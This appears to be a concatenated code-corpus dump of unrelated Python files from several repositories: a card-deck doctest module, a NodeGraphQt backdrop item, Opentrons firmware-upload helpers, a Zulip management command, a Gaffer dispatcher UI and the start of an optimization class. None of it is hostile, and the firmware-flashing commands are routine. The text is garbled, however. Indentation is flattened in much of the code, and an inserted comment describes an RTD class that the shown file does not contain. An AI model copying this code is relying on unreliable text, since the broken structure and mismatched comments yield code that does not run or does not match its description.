@property
def points(self) -> int:
return 10
def deck() -> Iterator[Card]:
for rank in range(1, 14):
for suit in cast(Iterable[Suit], Suit):
if rank == 1:
yield Ace(rank, suit)
elif rank >= 11:
yield Face(rank, suit)
else:
yield Card(rank, suit)
test_dataclass = """
>>> a = Card(7, Suit.Heart)
>>> a.rank
7
>>> a.suit
<Suit.Heart: '♥'>
>>> b = Card(7, Suit.Heart)
>>> a == b
True
>>> a < Card(8, Suit.Spade)
True
"""
test_hand = """
>>> import random
>>> random.seed(16)
>>> cards = list(deck())
>>> random.shuffle(cards)
>>> hand = cards[:5]
>>> any(c.rank == 1 for c in hand)
True
>>> any(c.points == 10 for c in hand)
True
>>> sum(c.points for c in hand)
34
>>> for c in hand:
... print(f"{c!r}: {c.points}")
Card(rank=3, suit=<Suit.Heart: '♥'>): 3
Ace(rank=1, suit=<Suit.Spade: '♠'>): 1
Face(rank=11, suit=<Suit.Club: '♣'>): 10
Face(rank=13, suit=<Suit.Spade: '♠'>): 10
Face(rank=12, suit=<Suit.Diamond: '♦'>): 10
>>> Ace(1, Suit.Spade) in set(hand)
True
"""
__test__ = {name: value for name, value in locals().items() if name.startswith("test_")}
if __name__ == "__main__":
import doctest
doctest.testmod(verbose=False)
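# Hedged sketch (illustrative, beyond the module's doctests): RTD.compute fills
# in whichever of rate/time/distance is None from the other two, so it chains
# naturally at construction time.
#     RTD(rate=None, time=2.0, distance=13.0).compute()
#     # -> RTD(rate=6.5, time=2.0, distance=13.0)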
|
ed6a708dd23245561461528ddb610a2948568bd2
|
8ce453de612c9024207d00d328df183c443c4e2d
|
/NodeGraphQt/qgraphics/node_backdrop.py
|
628d2186197cb650b0048a93d3c2099047d6a7d9
|
[
"MIT"
] |
permissive
|
jchanvfx/NodeGraphQt
|
71f946d7547f6b79c57ee2565d171a30c130a74e
|
4823b43642cce520ee88c5e89a0e1702c26ee9f0
|
refs/heads/main
| 2023-08-29T00:31:18.599300
| 2023-08-22T03:47:44
| 2023-08-22T03:47:44
| 101,639,727
| 1,015
| 255
|
MIT
| 2023-09-14T04:44:45
| 2017-08-28T12:13:27
|
Python
|
UTF-8
|
Python
| false
| false
| 10,718
|
py
|
node_backdrop.py
|
#!/usr/bin/python
from Qt import QtGui, QtCore, QtWidgets
from NodeGraphQt.constants import Z_VAL_PIPE, NodeEnum
from NodeGraphQt.qgraphics.node_abstract import AbstractNodeItem
from NodeGraphQt.qgraphics.pipe import PipeItem
from NodeGraphQt.qgraphics.port import PortItem
class BackdropSizer(QtWidgets.QGraphicsItem):
"""
Sizer item for resizing a backdrop item.
Args:
parent (BackdropNodeItem): the parent node item.
size (float): sizer size.
"""
def __init__(self, parent=None, size=6.0):
super(BackdropSizer, self).__init__(parent)
self.setFlag(self.ItemIsSelectable, True)
self.setFlag(self.ItemIsMovable, True)
self.setFlag(self.ItemSendsScenePositionChanges, True)
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor))
self.setToolTip('double-click auto resize')
self._size = size
@property
def size(self):
return self._size
def set_pos(self, x, y):
x -= self._size
y -= self._size
self.setPos(x, y)
def boundingRect(self):
return QtCore.QRectF(0.5, 0.5, self._size, self._size)
def itemChange(self, change, value):
if change == self.ItemPositionChange:
item = self.parentItem()
mx, my = item.minimum_size
x = mx if value.x() < mx else value.x()
y = my if value.y() < my else value.y()
value = QtCore.QPointF(x, y)
item.on_sizer_pos_changed(value)
return value
return super(BackdropSizer, self).itemChange(change, value)
def mouseDoubleClickEvent(self, event):
item = self.parentItem()
item.on_sizer_double_clicked()
super(BackdropSizer, self).mouseDoubleClickEvent(event)
def mousePressEvent(self, event):
self.__prev_xy = (self.pos().x(), self.pos().y())
super(BackdropSizer, self).mousePressEvent(event)
def mouseReleaseEvent(self, event):
current_xy = (self.pos().x(), self.pos().y())
if current_xy != self.__prev_xy:
item = self.parentItem()
item.on_sizer_pos_mouse_release()
del self.__prev_xy
super(BackdropSizer, self).mouseReleaseEvent(event)
def paint(self, painter, option, widget):
"""
Draws the backdrop sizer on the bottom right corner.
Args:
painter (QtGui.QPainter): painter used for drawing the item.
option (QtGui.QStyleOptionGraphicsItem):
used to describe the parameters needed to draw.
widget (QtWidgets.QWidget): not used.
"""
painter.save()
margin = 1.0
rect = self.boundingRect()
rect = QtCore.QRectF(rect.left() + margin,
rect.top() + margin,
rect.width() - (margin * 2),
rect.height() - (margin * 2))
item = self.parentItem()
if item and item.selected:
color = QtGui.QColor(*NodeEnum.SELECTED_BORDER_COLOR.value)
else:
color = QtGui.QColor(*item.color)
color = color.darker(110)
path = QtGui.QPainterPath()
path.moveTo(rect.topRight())
path.lineTo(rect.bottomRight())
path.lineTo(rect.bottomLeft())
painter.setBrush(color)
painter.setPen(QtCore.Qt.NoPen)
painter.fillPath(path, painter.brush())
painter.restore()
class BackdropNodeItem(AbstractNodeItem):
"""
Base Backdrop item.
Args:
name (str): name displayed on the node.
text (str): backdrop text.
parent (QtWidgets.QGraphicsItem): parent item.
"""
def __init__(self, name='backdrop', text='', parent=None):
super(BackdropNodeItem, self).__init__(name, parent)
self.setZValue(Z_VAL_PIPE - 1)
self._properties['backdrop_text'] = text
self._min_size = 80, 80
self._sizer = BackdropSizer(self, 26.0)
self._sizer.set_pos(*self._min_size)
self._nodes = [self]
def _combined_rect(self, nodes):
group = self.scene().createItemGroup(nodes)
rect = group.boundingRect()
self.scene().destroyItemGroup(group)
return rect
def mouseDoubleClickEvent(self, event):
viewer = self.viewer()
if viewer:
viewer.node_double_clicked.emit(self.id)
super(BackdropNodeItem, self).mouseDoubleClickEvent(event)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
pos = event.scenePos()
rect = QtCore.QRectF(pos.x() - 5, pos.y() - 5, 10, 10)
item = self.scene().items(rect)[0]
if isinstance(item, (PortItem, PipeItem)):
self.setFlag(self.ItemIsMovable, False)
return
if self.selected:
return
viewer = self.viewer()
[n.setSelected(False) for n in viewer.selected_nodes()]
self._nodes += self.get_nodes(False)
[n.setSelected(True) for n in self._nodes]
def mouseReleaseEvent(self, event):
super(BackdropNodeItem, self).mouseReleaseEvent(event)
self.setFlag(self.ItemIsMovable, True)
[n.setSelected(True) for n in self._nodes]
self._nodes = [self]
def on_sizer_pos_changed(self, pos):
self._width = pos.x() + self._sizer.size
self._height = pos.y() + self._sizer.size
def on_sizer_pos_mouse_release(self):
size = {
'pos': self.xy_pos,
'width': self._width,
'height': self._height}
self.viewer().node_backdrop_updated.emit(
self.id, 'sizer_mouse_release', size)
def on_sizer_double_clicked(self):
size = self.calc_backdrop_size()
self.viewer().node_backdrop_updated.emit(
self.id, 'sizer_double_clicked', size)
def paint(self, painter, option, widget):
"""
Draws the backdrop rect.
Args:
painter (QtGui.QPainter): painter used for drawing the item.
option (QtGui.QStyleOptionGraphicsItem):
used to describe the parameters needed to draw.
widget (QtWidgets.QWidget): not used.
"""
painter.save()
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(QtCore.Qt.NoBrush)
margin = 1.0
rect = self.boundingRect()
rect = QtCore.QRectF(rect.left() + margin,
rect.top() + margin,
rect.width() - (margin * 2),
rect.height() - (margin * 2))
radius = 2.6
color = (self.color[0], self.color[1], self.color[2], 50)
painter.setBrush(QtGui.QColor(*color))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRoundedRect(rect, radius, radius)
top_rect = QtCore.QRectF(rect.x(), rect.y(), rect.width(), 26.0)
painter.setBrush(QtGui.QBrush(QtGui.QColor(*self.color)))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRoundedRect(top_rect, radius, radius)
for pos in [top_rect.left(), top_rect.right() - 5.0]:
painter.drawRect(
QtCore.QRectF(pos, top_rect.bottom() - 5.0, 5.0, 5.0))
if self.backdrop_text:
            painter.setPen(QtGui.QColor(*self.text_color))
            txt_rect = QtCore.QRectF(
                top_rect.x() + 5.0, top_rect.height() + 3.0,
                rect.width() - 5.0, rect.height())
painter.drawText(txt_rect,
QtCore.Qt.AlignLeft | QtCore.Qt.TextWordWrap,
self.backdrop_text)
if self.selected:
sel_color = [x for x in NodeEnum.SELECTED_COLOR.value]
sel_color[-1] = 15
painter.setBrush(QtGui.QColor(*sel_color))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRoundedRect(rect, radius, radius)
txt_rect = QtCore.QRectF(top_rect.x(), top_rect.y(),
rect.width(), top_rect.height())
painter.setPen(QtGui.QColor(*self.text_color))
painter.drawText(txt_rect, QtCore.Qt.AlignCenter, self.name)
border = 0.8
border_color = self.color
if self.selected and NodeEnum.SELECTED_BORDER_COLOR.value:
border = 1.0
border_color = NodeEnum.SELECTED_BORDER_COLOR.value
painter.setBrush(QtCore.Qt.NoBrush)
painter.setPen(QtGui.QPen(QtGui.QColor(*border_color), border))
painter.drawRoundedRect(rect, radius, radius)
painter.restore()
def get_nodes(self, inc_intersects=False):
mode = {True: QtCore.Qt.IntersectsItemShape,
False: QtCore.Qt.ContainsItemShape}
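        # ContainsItemShape collects only nodes fully inside the backdrop;
        # IntersectsItemShape also collects nodes overlapping its border.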
nodes = []
if self.scene():
polygon = self.mapToScene(self.boundingRect())
rect = polygon.boundingRect()
items = self.scene().items(rect, mode=mode[inc_intersects])
for item in items:
if item == self or item == self._sizer:
continue
if isinstance(item, AbstractNodeItem):
nodes.append(item)
return nodes
def calc_backdrop_size(self, nodes=None):
nodes = nodes or self.get_nodes(True)
if nodes:
nodes_rect = self._combined_rect(nodes)
else:
center = self.mapToScene(self.boundingRect().center())
nodes_rect = QtCore.QRectF(
center.x(), center.y(),
self._min_size[0], self._min_size[1]
)
padding = 40
return {
'pos': [
nodes_rect.x() - padding, nodes_rect.y() - padding
],
'width': nodes_rect.width() + (padding * 2),
'height': nodes_rect.height() + (padding * 2)
}
@property
def minimum_size(self):
return self._min_size
@minimum_size.setter
def minimum_size(self, size=(50, 50)):
self._min_size = size
@property
def backdrop_text(self):
return self._properties['backdrop_text']
@backdrop_text.setter
def backdrop_text(self, text):
self._properties['backdrop_text'] = text
self.update(self.boundingRect())
@AbstractNodeItem.width.setter
def width(self, width=0.0):
AbstractNodeItem.width.fset(self, width)
self._sizer.set_pos(self._width, self._height)
@AbstractNodeItem.height.setter
def height(self, height=0.0):
AbstractNodeItem.height.fset(self, height)
self._sizer.set_pos(self._width, self._height)
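# Hedged sketch (not part of the original module): `calc_backdrop_size` above
# pads the combined bounding rect of the wrapped nodes by a fixed margin on
# every side. The same arithmetic, without any Qt dependency:
def _example_backdrop_padding(x=10.0, y=20.0, w=100.0, h=50.0, padding=40):
    """Return pos/width/height for a rect padded like calc_backdrop_size."""
    return {
        'pos': [x - padding, y - padding],   # origin shifts up and left
        'width': w + (padding * 2),          # one padding per side
        'height': h + (padding * 2),
    }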
# ==== Opentrons/opentrons :: /api/src/opentrons/hardware_control/modules/update.py (Apache-2.0) ====
import asyncio
import logging
import os
from pathlib import Path
from glob import glob
from typing import Any, AsyncGenerator, Dict, Tuple, Optional, Union
from .types import UpdateError
from .mod_abc import AbstractModule
from opentrons.hardware_control.threaded_async_lock import ThreadedAsyncLock
from contextlib import asynccontextmanager
log = logging.getLogger(__name__)
_update_transition_lock = ThreadedAsyncLock()
@asynccontextmanager
async def protect_update_transition() -> AsyncGenerator[None, None]:
async with _update_transition_lock.lock():
yield
async def update_firmware(
module: AbstractModule,
firmware_file: Union[str, Path],
loop: Optional[asyncio.AbstractEventLoop],
) -> None:
"""Apply update of given firmware file to given module.
raises an UpdateError with the reason for the failure.
"""
async with protect_update_transition():
flash_port_or_dfu_serial = await module.prep_for_update()
kwargs: Dict[str, Any] = {
"stdout": asyncio.subprocess.PIPE,
"stderr": asyncio.subprocess.PIPE,
"loop": loop,
}
successful, res = await module.bootloader()(
flash_port_or_dfu_serial, str(firmware_file), kwargs
)
if not successful:
            log.info(f"Bootloader response: {res}")
raise UpdateError(res)
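# Hedged usage sketch (the module instance and firmware path are hypothetical,
# not from the original source): update_firmware() is a coroutine, so callers
# await it and catch UpdateError on failure.
async def _example_update(module: AbstractModule) -> None:
    try:
        await update_firmware(module, Path("/tmp/module_fw.hex"), None)
    except UpdateError as err:
        log.error(f"Module update failed: {err}")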
async def find_bootloader_port() -> str:
"""
Finds the port of an Opentrons Module that has entered its bootloader.
The bootloader port shows up as 'ot_module_(avrdude|samba)_bootloader'
on the pi; return found port.
"""
for attempt in range(3):
bootloader_ports = glob("/dev/ot_module_*_bootloader*")
if bootloader_ports:
if len(bootloader_ports) == 1:
log.info(f"Found bootloader at port {bootloader_ports[0]}")
return bootloader_ports[0]
elif len(bootloader_ports) > 1:
                raise OSError("Multiple new bootloader ports found on mode switch")
await asyncio.sleep(2)
raise Exception("No ot_module bootloaders found in /dev. Try again")
async def find_dfu_device(pid: str, expected_device_count: int) -> str:
"""
Find the dfu device and return its serial number (separate from module serial).
Args:
- pid: The USB Product ID of the device
- expected_device_count: The expected number of "devices" for dfu-util
to find for this PID. This is necessary because most STM32 MCU's
will enumerate with multiple DFU devices, representing the
separate programmable memory regions on the device. If more than
this many devices are found, it is assumed that either the wrong
module is in DFU mode *or* multiple modules are in DFU mode.
"""
retries = 5
log.info(f"Searching for a dfu device with PID {pid}")
while retries != 0:
retries -= 1
await asyncio.sleep(1)
proc = await asyncio.create_subprocess_exec(
"dfu-util",
"-l",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
await proc.wait()
stdout, stderr = await proc.communicate()
if stdout is None and stderr is None:
continue
if stderr:
raise RuntimeError(f"Error finding dfu device: {stderr.decode()}")
result = stdout.decode()
if pid not in result:
# It could take a few seconds for the device to show up
continue
devices_found = 0
for line in result.splitlines():
if pid in line:
log.info(f"Found device with PID {pid}")
devices_found += 1
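                # Everything after "serial=" is the DFU serial number;
                # len("serial=") == 7, hence the +7 offset below.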
serial = line[(line.find("serial=") + 7) :]
if devices_found == expected_device_count:
# Heater-Shaker has 2 unique endpoints, Thermocycler has 3
return serial
elif devices_found > expected_device_count:
            raise OSError("Multiple new bootloader devices found on mode switch")
    raise RuntimeError(
        "Could not update firmware via dfu. Possible issues: dfu-util"
        " not working or the specified dfu device not found"
    )
async def upload_via_avrdude(
port: str, firmware_file_path: str, kwargs: Dict[str, Any]
) -> Tuple[bool, str]:
"""
Run firmware upload command for hardware module with avrdude bootloader.
Returns tuple of success boolean and message from bootloader.
"""
# avrdude_options
PART_NO = "atmega32u4"
PROGRAMMER_ID = "avr109"
BAUDRATE = "57600"
config_file_path = Path("/etc/avrdude.conf")
proc = await asyncio.create_subprocess_exec(
"avrdude",
"-C{}".format(config_file_path),
"-v",
"-p{}".format(PART_NO),
"-c{}".format(PROGRAMMER_ID),
"-P{}".format(port),
"-b{}".format(BAUDRATE),
"-D",
"-Uflash:w:{}:i".format(firmware_file_path),
**kwargs,
)
await proc.wait()
_result = await proc.communicate()
result = _result[1].decode()
avrdude_res = _format_avrdude_response(result)
if avrdude_res[0]:
log.debug(result)
else:
log.error(
"Failed to update module firmware for {}: {}".format(port, avrdude_res[1])
)
return avrdude_res
def _format_avrdude_response(raw_response: str) -> Tuple[bool, str]:
    avrdude_log = ""
    lines = raw_response.splitlines()
    for index, line in enumerate(lines):
        # Skip the second output line (avrdude's version banner). Use a
        # prefix split rather than str.lstrip, which strips a character set
        # and can eat the start of the message itself.
        if "avrdude:" in line and index != 1:
            avrdude_log += line.split("avrdude:", 1)[1].strip() + ".."
            if "flash verified" in line:
                return True, line.split("avrdude:", 1)[1].strip()
    return False, avrdude_log
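# Hedged worked example (the log lines are fabricated for illustration): the
# parser skips the second output line and returns on the first line containing
# "flash verified".
#
#   raw = ("avrdude: start\n"
#          "avrdude: Version 6.3\n"
#          "avrdude: 123 bytes of flash verified")
#   _format_avrdude_response(raw)  # -> (True, '123 bytes of flash verified')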
async def upload_via_bossa(
port: str, firmware_file_path: str, kwargs: Dict[str, Any]
) -> Tuple[bool, str]:
"""
Run firmware upload command for hardware module with SAMBA bootloader.
Returns tuple of success boolean and message from bootloader.
"""
# bossac -p/dev/ttyACM1 -e -w -v -R --offset=0x2000
# modules/thermo-cycler/production/firmware/thermo-cycler-arduino.ino.bin
# NOTE: bossac cannot traverse symlinks to port,
# so we resolve to real path
resolved_symlink = os.path.realpath(port)
log.info(
f"device at symlinked port: {port} " f"resolved to path: {resolved_symlink}"
)
bossa_args = [
"bossac",
f"-p{resolved_symlink}",
"-e",
"-w",
"-v",
"-R",
"--offset=0x2000",
f"{firmware_file_path}",
]
proc = await asyncio.create_subprocess_exec(*bossa_args, **kwargs)
stdout, stderr = await proc.communicate()
res = stdout.decode()
if "Verify successful" in res:
log.debug(res)
return True, res
elif stderr:
log.error(f"Failed to update module firmware for {port}: {res}")
log.error(f"Error given: {stderr.decode()}")
return False, res
return False, ""
async def upload_via_dfu(
dfu_serial: str, firmware_file_path: str, kwargs: Dict[str, Any]
) -> Tuple[bool, str]:
"""Run firmware upload command for DFU.
Unlike other firmware upload methods, this one doesn't take a `port` argument since
the module isn't recognized as a cdc device in dfu mode and hence doesn't get
a port. The firmware upload utility, dfu-util, looks for the specific module
by searching for available dfu devices. Since we check beforehand that only one
dfu device is available during the upload process, this check is sufficient for us.
In the future, if we want to make sure that the dfu device available is in fact
the one we seek, then we can ask dfu-util to check for available dfu devices with
a specific serial number (unrelated to Opentrons' module serial numbers).
Hence, this method takes a `dfu_serial` argument instead.
Returns tuple of success boolean and message from bootloader
"""
log.info("Starting firmware upload via dfu util")
dfu_args = [
"dfu-util",
"-a 0",
"-s 0x08000000:leave",
f"-D{firmware_file_path}",
"-R",
]
proc = await asyncio.create_subprocess_exec(*dfu_args, **kwargs)
stdout, stderr = await proc.communicate()
res = stdout.decode()
if "File downloaded successfully" in res:
log.debug(res)
log.info("Firmware upload successful")
return True, res
else:
log.error(
f"Failed to update module firmware for {dfu_serial}. "
            # It isn't easy to decipher the issue from stderr alone
f"stdout: {res} \n"
f"stderr: {stderr.decode()}"
)
return False, res
# ==== zulip/zulip :: /analytics/management/commands/clear_single_stat.py (Apache-2.0) ====
from argparse import ArgumentParser
from typing import Any
from django.core.management.base import BaseCommand, CommandError
from analytics.lib.counts import COUNT_STATS, do_drop_single_stat
class Command(BaseCommand):
    help = """Clear a single analytics stat."""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument("--force", action="store_true", help="Actually do it.")
parser.add_argument("--property", help="The property of the stat to be cleared.")
def handle(self, *args: Any, **options: Any) -> None:
property = options["property"]
if property not in COUNT_STATS:
raise CommandError(f"Invalid property: {property}")
if not options["force"]:
raise CommandError("No action taken. Use --force.")
do_drop_single_stat(property)
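# Hedged usage sketch (the stat name is illustrative, not from the original
# source): run via Django's management entry point, e.g.
#
#   ./manage.py clear_single_stat --property=active_users_audit:is_bot:day --force
#
# Without --force the command raises CommandError before touching any data.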
# ==== GafferHQ/gaffer :: /python/GafferDispatchUI/LocalDispatcherUI.py (BSD-3-Clause) ====
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import weakref
import Gaffer
import GafferUI
import GafferDispatch
from Qt import QtCore
from Qt import QtGui
Gaffer.Metadata.registerNode(
GafferDispatch.LocalDispatcher,
"description",
"""
Schedules execution of task graphs on the local machine. Tasks
may be dispatched in the background to keep the UI responsive.
""",
plugs = {
"executeInBackground" : (
"description",
"""
Executes the dispatched tasks in separate processes via a
background thread.
""",
),
"ignoreScriptLoadErrors" : (
"description",
"""
Ignores errors loading the script when executing in the background.
This is not recommended - fix the problem instead.
""",
),
"environmentCommand" : (
"description",
"""
Optional system command to modify the environment when launching
tasks in the background. Background tasks are launched in a separate
process using a `gaffer execute ...` command, and they inherit the
environment from the launching process. When an environment
command is specified, tasks are instead launched using `environmentCommand
gaffer execute ...`, and the environment command is responsible for
modifying the inherited environment and then launching `gaffer execute ...`.
For example, the following environment command will use the standard `/usr/bin/env`
program to set some custom variables :
```
/usr/bin/env FOO=BAR TOTO=TATA
```
"""
),
}
)
##########################################################################
# Public functions
##########################################################################
def appendMenuDefinitions( menuDefinition, prefix="" ) :
menuDefinition.append( prefix + "/View Local Jobs", { "command" : __showLocalDispatcherWindow } )
##################################################################################
# Dispatcher Window
##################################################################################
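## Hedged explanatory note (not from the original source): each child of
# _LocalJobsPath wraps a single LocalDispatcher Job, and the
# "localDispatcher:*" properties queried by the PathListingWidget columns
# below are computed on demand in `property()`.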
class _LocalJobsPath( Gaffer.Path ) :
def __init__( self, jobPool, job = None, path = None, root = "/" ) :
Gaffer.Path.__init__( self, path = path, root = root )
self.__jobPool = jobPool
self.__job = job
def copy( self ) :
c = self.__class__( self.__jobPool, self.__job )
return c
def propertyNames( self, canceller = None ) :
		return Gaffer.Path.propertyNames( self ) + [
"localDispatcher:status",
"localDispatcher:id",
"localDispatcher:jobName",
"localDispatcher:directory",
"localDispatcher:cpu",
"localDispatcher:memory",
]
def property( self, name, canceller = None ) :
result = Gaffer.Path.property( self, name )
if result is not None :
return result
if self.__job is None :
return None
if name == "localDispatcher:status" :
if self.__job.failed() :
return "Failed"
elif self.__job.killed() :
return "Killed"
else :
return "Running"
elif name == "localDispatcher:id" :
return self.__job.id()
elif name == "localDispatcher:jobName" :
return self.__job.name()
elif name == "localDispatcher:directory" :
return self.__job.directory()
elif name == "localDispatcher:cpu" :
stats = self.__job.statistics()
return "{0:.2f} %".format( stats["pcpu"] ) if "pcpu" in stats.keys() else "N/A"
elif name == "localDispatcher:memory" :
stats = self.__job.statistics()
return "{0:.2f} GB".format( stats["rss"] / 1024.0 / 1024.0 ) if "rss" in stats.keys() else "N/A"
return None
def job( self ) :
return self.__job
def jobPool( self ) :
return self.__jobPool
def isLeaf( self, canceller = None ) :
return len( self )
def _children( self, canceller ) :
if self.isLeaf() :
return []
result = []
jobs = self.__jobPool.jobs() + self.__jobPool.failedJobs()
for job in jobs :
result.append(
_LocalJobsPath(
jobPool = self.__jobPool,
job = job,
path = [ str(jobs.index(job)) ],
)
)
return result
class _LocalJobsWindow( GafferUI.Window ) :
def __init__( self, jobPool, **kw ) :
GafferUI.Window.__init__( self, **kw )
with self :
with GafferUI.SplitContainer( borderWidth = 8 ) :
self.__jobListingWidget = GafferUI.PathListingWidget(
_LocalJobsPath( jobPool ),
columns = (
GafferUI.PathListingWidget.IconColumn( "Status", "localDispatcherStatus", "localDispatcher:status" ),
GafferUI.PathListingWidget.StandardColumn( "Name", "localDispatcher:jobName", sizeMode = GafferUI.PathColumn.SizeMode.Stretch ),
GafferUI.PathListingWidget.StandardColumn( "Id", "localDispatcher:id" ),
GafferUI.PathListingWidget.StandardColumn( "CPU", "localDispatcher:cpu" ),
GafferUI.PathListingWidget.StandardColumn( "Memory", "localDispatcher:memory" ),
),
selectionMode = GafferUI.PathListingWidget.SelectionMode.Rows,
)
self.__jobListingWidget._qtWidget().header().setSortIndicator( 1, QtCore.Qt.AscendingOrder )
self.__jobListingWidget.selectionChangedSignal().connect( Gaffer.WeakMethod( self.__jobSelectionChanged ), scoped = False )
with GafferUI.TabbedContainer() as self.__tabs :
with GafferUI.ScrolledContainer( parenting = { "label" : "Details" } ) as self.__detailsTab :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing=10, borderWidth=10 ) :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=15 ) :
GafferUI.Label( "<h3>Current Batch</h3>" )
self.__detailsCurrentDescription = GafferUI.Label( "N/A" )
self.__detailsCurrentDescription.setTextSelectable( True )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=15 ) :
GafferUI.Label( "<h3>Directory</h3>" )
self.__detailsDirectory = GafferUI.Label( "N/A" )
self.__detailsDirectory.setTextSelectable( True )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing=10, borderWidth=10, parenting = { "label" : "Messages" } ) as self.__messagesTab :
self.__messageWidget = GafferUI.MessageWidget( toolbars = True, follow = True )
self.__messageWidget._qtWidget().setMinimumHeight( 150 )
self.__tabs.currentChangedSignal().connect( Gaffer.WeakMethod( self.__tabChanged ), scoped = False )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=5 ) :
self.__killButton = GafferUI.Button( "Kill Selected Jobs" )
self.__killButton.setEnabled( False )
self.__killButton.clickedSignal().connect( Gaffer.WeakMethod( self.__killClicked ), scoped = False )
self.__removeButton = GafferUI.Button( "Remove Failed Jobs" )
self.__removeButton.setEnabled( False )
self.__removeButton.clickedSignal().connect( Gaffer.WeakMethod( self.__removeClicked ), scoped = False )
self.setTitle( "Local Dispatcher Jobs" )
self.__updateTimer = QtCore.QTimer()
self.__updateTimer.timeout.connect( Gaffer.WeakMethod( self.__update ) )
self.visibilityChangedSignal().connect( Gaffer.WeakMethod( self.__visibilityChanged ), scoped = False )
jobPool.jobAddedSignal().connect( Gaffer.WeakMethod( self.__jobAdded ), scoped = False )
jobPool.jobRemovedSignal().connect( Gaffer.WeakMethod( self.__jobRemoved ), scoped = False )
## Acquires the LocalJobsWindow for the specified application.
@staticmethod
def acquire( jobPool ) :
assert( isinstance( jobPool, GafferDispatch.LocalDispatcher.JobPool ) )
window = getattr( jobPool, "_window", None )
if window is not None and window() :
return window()
window = _LocalJobsWindow( jobPool )
jobPool._window = weakref.ref( window )
return window
def __visibilityChanged( self, widget ) :
if widget.visible() :
self.__updateTimer.start( 5000 )
else :
self.__updateTimer.stop()
def __jobAdded( self, job ) :
GafferUI.EventLoop.executeOnUIThread( self.__update )
def __jobRemoved( self, job ) :
GafferUI.EventLoop.executeOnUIThread( self.__update )
def __update( self ) :
self.__jobListingWidget.getPath()._emitPathChanged()
def __updateDetails( self ) :
jobs = self.__selectedJobs()
if len( jobs ) != 1 :
self.__detailsCurrentDescription.setText( "N/A" )
self.__detailsDirectory.setText( "N/A" )
return
self.__detailsCurrentDescription.setText( jobs[0].description() )
self.__detailsDirectory.setText( jobs[0].directory() )
def __updateMessages( self ) :
self.__messageWidget.clear()
jobs = self.__selectedJobs()
if len( jobs ) != 1 :
return
for m in jobs[0].messageHandler().messages :
self.__messageWidget.messageHandler().handle( m.level, m.context, m.message )
def __killClicked( self, button ) :
for job in self.__selectedJobs() :
job.kill()
self.__update()
def __removeClicked( self, button ) :
jobPool = self.__jobListingWidget.getPath().jobPool()
for job in self.__selectedJobs() :
if job.failed() :
jobPool._remove( job, force = True )
self.__update()
def __selectedJobs( self ) :
rootPath = self.__jobListingWidget.getPath()
selection = self.__jobListingWidget.getSelection()
return [
path.job() for path in rootPath.children()
if selection.match( str( path ) ) & selection.Result.ExactMatch
]
def __jobSelectionChanged( self, widget ) :
jobs = self.__selectedJobs()
numFailed = len( [ job for job in jobs if job.failed() ] )
self.__removeButton.setEnabled( numFailed )
self.__killButton.setEnabled( len( jobs ) - numFailed > 0 )
currentTab = self.__tabs.getCurrent()
if currentTab is self.__detailsTab :
self.__updateDetails()
elif currentTab is self.__messagesTab :
self.__updateMessages()
def __tabChanged( self, tabs, currentTab ) :
if currentTab is self.__detailsTab :
self.__updateDetails()
elif currentTab is self.__messagesTab :
self.__updateMessages()
##########################################################################
# Implementation Details
##########################################################################
def __showLocalDispatcherWindow( menu ) :
window = _LocalJobsWindow.acquire( GafferDispatch.LocalDispatcher.defaultJobPool() )
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
scriptWindow.addChildWindow( window )
window.setVisible( True )
# ==== jaswinder9051998/zoofs :: /zoofs/greywolfoptimization.py (Apache-2.0) ====
from zoofs.baseoptimizationalgorithm import BaseOptimizationAlgorithm
import numpy as np
import time
import warnings
class GreyWolfOptimization(BaseOptimizationAlgorithm):
def __init__(
self,
objective_function,
n_iteration: int = 1000,
timeout: int = None,
population_size=50,
method=1,
minimize=True,
logger=None,
**kwargs,
):
"""
Parameters
----------
        objective_function : user-made function with the signature 'func(model,X_train,y_train,X_test,y_test)'
            The function must return a value that is to be minimized/maximized.
        n_iteration : int, default=1000
            Number of times the optimization algorithm will run
timeout: int = None
            Stop the optimization after the given number of seconds.
            If set to None, the run is limited only by n_iteration
population_size : int, default=50
Total size of the population
method : {1, 2}, default=1
            Choose between the two methods of grey wolf optimization
minimize : bool, default=True
Defines if the objective value is to be maximized or minimized
logger: Logger or None, optional (default=None)
